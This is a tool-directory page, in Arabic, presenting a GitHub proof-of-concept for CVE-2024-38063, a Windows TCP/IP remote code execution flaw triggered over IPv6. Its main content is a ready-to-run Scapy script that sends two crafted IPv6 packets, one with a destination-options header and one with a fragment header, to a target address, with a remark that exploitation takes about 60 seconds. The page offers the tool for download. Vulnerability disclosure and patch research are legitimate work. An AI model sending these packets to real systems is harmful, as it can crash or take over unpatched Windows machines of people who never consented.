Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/patchpoint/cve-2024-38063
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقتطوير الحمولاتاستغلال الملفات الثنائية
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

إثبات مفهوم لاستغلال CVE-2024-38063، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في TCP/IP بنظام ويندوز يتم تفعيلها عن طريق إرسال حزمتي IPv6 مُصممتين بعناية تحتويان على خيارات الوجهة وترويسات التجزئة.

عرض المستودع
2033منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-38063

نظرة عامة

في أغسطس 2024، أصدرت مايكروسوفت تصحيحًا لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) في TCP/IP لنظام ويندوز. نشر بعض الباحثين بالفعل إثباتات المفهوم (PoC) لهذه الثغرة، وفي الوقت نفسه تقريبًا، أكمل باحثو PatchPoint تحليلهم وإعادة إنتاج هذه المشكلة. بسبب انتشار المعلومات المضللة عبر منصات متعددة، بما في ذلك تويتر، يبدو أن النقاط الحرجة المطلوبة لاستغلال هذه الثغرة قد أُسيء فهمها. وعلى عكس هذه الأخطاء، قررنا إصدار إثبات مفهوم (PoC) يوضح كيف يمكن استغلال هذه الثغرة بإرسال حزمتين فقط؛ في الواقع، ليس من الضروري إرسال عدد كبير من الحزم لاستغلال هذه الثغرة.

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

عرض توضيحي

CVE-2024-38063_Demo.mp4

※ لاستغلال الثغرة، يلزم انتظار حوالي 60 ثانية

المرجع

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
تنزيل الأداة